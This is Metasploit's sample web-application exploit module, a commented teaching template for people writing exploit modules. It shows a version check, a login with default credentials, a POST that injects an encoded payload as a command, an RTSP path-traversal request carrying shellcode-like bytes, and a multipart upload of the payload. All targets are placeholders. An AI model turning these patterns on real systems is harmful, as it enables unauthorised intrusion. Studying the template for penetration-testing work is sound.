Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/example_webapp.rb
Views: 11766
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45###6#7# This exploit sample shows how an exploit module could be written to exploit8# a bug in an arbitrary web server9#10###11class MetasploitModule < Msf::Exploit::Remote12Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html1314#15# This exploit affects a webapp, so we need to import HTTP Client16# to easily interact with it.17#18include Msf::Exploit::Remote::HttpClient1920# There are libraries for several CMSes such as WordPress, Typo3,21# SharePoint, Nagios XI, Moodle, Joomla, JBoss, and Drupal.22#23# The following import just includes the code for the WordPress library,24# however you can find other similar libraries at25# https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/remote/http26include Msf::Exploit::Remote::HTTP::Wordpress2728def initialize(info = {})29super(30update_info(31info,32# The Name should be just like the line of a Git commit - software name,33# vuln type, class. Preferably apply34# some search optimization so people can actually find the module.35# We encourage consistency between module name and file name.36'Name' => 'Sample Webapp Exploit',37'Description' => %q{38This exploit module illustrates how a vulnerability could be exploited39in a webapp.40},41'License' => MSF_LICENSE,42# The place to add your name/handle and email. Twitter and other contact info isn't handled here.43# Add reference to additional authors, like those creating original proof of concepts or44# reference materials.45# It is also common to comment in who did what (PoC vs metasploit module, etc)46'Author' => [47'h00die <[email protected]>', # msf module48'researcher' # original PoC, analysis49],50'References' => [51[ 'OSVDB', '12345' ],52[ 'EDB', '12345' ],53[ 'URL', 'http://www.example.com'],54[ 'CVE', '1978-1234']55],56# platform refers to the type of platform. For webapps, this is typically the language of the webapp.57# js, php, python, nodejs are common, this will effect what payloads can be matched for the exploit.58# A full list is available in lib/msf/core/payload/uuid.rb59'Platform' => ['python'],60# from lib/msf/core/module/privileged, denotes if this requires or gives privileged access61'Privileged' => false,62# from underlying architecture of the system. typically ARCH_X64 or ARCH_X86, but for webapps typically63# this is the application language. ARCH_PYTHON, ARCH_PHP, ARCH_JAVA are some examples64# A full list is available in lib/msf/core/payload/uuid.rb65'Arch' => ARCH_PYTHON,66'Targets' => [67[ 'Automatic Target', {}]68],69'DisclosureDate' => '2023-12-30',70# Note that DefaultTarget refers to the index of an item in Targets, rather than name.71# It's generally easiest just to put the default at the beginning of the list and skip this72# entirely.73'DefaultTarget' => 0,74# https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html75'Notes' => {76'Stability' => [],77'Reliability' => [],78'SideEffects' => []79}80)81)82# set the default port, and a URI that a user can set if the app isn't installed to the root83register_options(84[85Opt::RPORT(80),86OptString.new('USERNAME', [ true, 'User to login with', 'admin']),87OptString.new('PASSWORD', [ false, 'Password to login with', '123456']),88OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/example/'])89]90)91end9293#94# The sample exploit checks the index page to verify the version number is exploitable95# we use a regex for the version number96#97def check98# only catch the response if we're going to use it, in this case we do for the version99# detection.100res = send_request_cgi(101'uri' => normalize_uri(target_uri.path, 'index.php'),102'method' => 'GET'103)104# gracefully handle if res comes back as nil, since we're not guaranteed a response105# also handle if we get an unexpected HTTP response code106return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?107return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code == 200108109# here we're looking through html for the version string, similar to:110# Version 1.2111%r{Version: (?<version>\d{1,2}\.\d{1,2})</td>} =~ res.body112113if version && Rex::Version.new(version) <= Rex::Version.new('1.3')114CheckCode::Appears("Version Detected: #{version}")115end116117CheckCode::Safe118end119120#121# The exploit method attempts a login, then attempts to throw a command execution122# at a web page through a POST variable123#124def exploit125# attempt a login. In this case we show basic auth, and a POST to a fake username/password126# simply to show how both are done127vprint_status('Attempting login')128# since we will check res to see if auth was a success, make sure to capture the return129res = send_request_cgi(130'uri' => normalize_uri(target_uri.path, 'login.php'),131'method' => 'POST',132'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),133# automatically handle cookies with keep_cookies. Alternatively use cookie = res.get_cookies and 'cookie' => cookie,134'keep_cookies' => true,135'vars_post' => {136'username' => datastore['USERNAME'],137'password' => datastore['PASSWORD']138},139'vars_get' => {140'example' => 'example'141}142)143144# a valid login will give us a 301 redirect to /home.html so check that.145# ALWAYS assume res could be nil and check it first!!!!!146fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?147fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 301148149# we don't care what the response is, so don't bother saving it from send_request_cgi150# datastore['HttpClientTimeout'] ONLY IF we need a longer HTTP timeout151vprint_status('Attempting exploit')152send_request_cgi({153'uri' => normalize_uri(target_uri.path, 'command.html'),154'method' => 'POST',155'vars_post' =>156{157'cmd_str' => payload.encoded158}159}, datastore['HttpClientTimeout'])160161# send_request_raw is used when we need to break away from the HTTP protocol in some way for the exploit to work162send_request_raw({163'method' => 'DESCRIBE',164'proto' => 'RTSP',165'version' => '1.0',166'uri' => '/' + ('../' * 560) + "\xcc\xcc\x90\x90" + '.smi'167}, datastore['HttpClientTimeout'])168169# example of sending a MIME message170data = Rex::MIME::Message.new171# https://github.com/rapid7/rex-mime/blob/master/lib/rex/mime/message.rb172file_contents = payload.encoded173data.add_part(file_contents, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"uploaded.bin\"")174data.add_part('example', nil, nil, "form-data; name=\"_wpnonce\"")175176post_data = data.to_s177178res = send_request_cgi(179'method' => 'POST',180'uri' => normalize_uri(target_uri.path, 'async-upload.php'),181'ctype' => "multipart/form-data; boundary=#{data.bound}",182'data' => post_data,183'cookie' => cookie184)185rescue ::Rex::ConnectionError186fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")187end188end189190191